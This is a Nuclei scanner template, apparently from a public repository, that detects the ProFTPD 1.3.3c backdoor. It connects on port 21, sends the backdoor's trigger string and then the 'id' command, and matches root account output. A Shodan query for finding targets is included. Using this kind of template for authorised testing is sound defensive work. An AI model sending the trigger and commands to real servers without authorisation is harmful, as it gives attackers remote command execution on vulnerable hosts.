nuclei-templates/javascript/backdoor/proftpd-backdoor.yaml

51 lines
1.4 KiB
YAML
Raw Permalink Normal View History

id: proftpd-backdoor
info:
name: ProFTPd-1.3.3c - Backdoor Command Execution
author: pussycat0x
severity: critical
description: |
This backdoor was present in the proftpd-1.3.3c.
reference:
- https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
- https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
metadata:
max-request: 1
shodan-query: "product:\"ProFTPD\""
tags: js,network,proftpd,ftp,backdoor
2024-07-10 12:08:01 +00:00
javascript:
2024-07-10 12:08:01 +00:00
- pre-condition: |
isPortOpen(Host,Port);
code: |
const data = ["HELP ACIDBITCHEZ\n", "id"];
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
let resp = conn.RecvFullString();
if (resp.includes("ProFTPD 1.3.3c"))
{
for (let i = 0; i < data.length; i++)
{
conn.Send(data[i]);
console.log('Sending:', data[i]);
let resp = conn.RecvFullString();
resp
}
} else
{
exit();
}
args:
Host: "{{Host}}"
Port: 21
matchers:
- type: dsl
dsl:
- "success == true"
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a00473045022100bb82a217b67498139c709562bd0f21f865658f6d4a27ef4e3d8a86886323865202202ffeb3c9273386c04f21a49024b4f3584dd5532fc3ad238e5c669b9d47025825:922c64590222798bb761d5b6d8e72950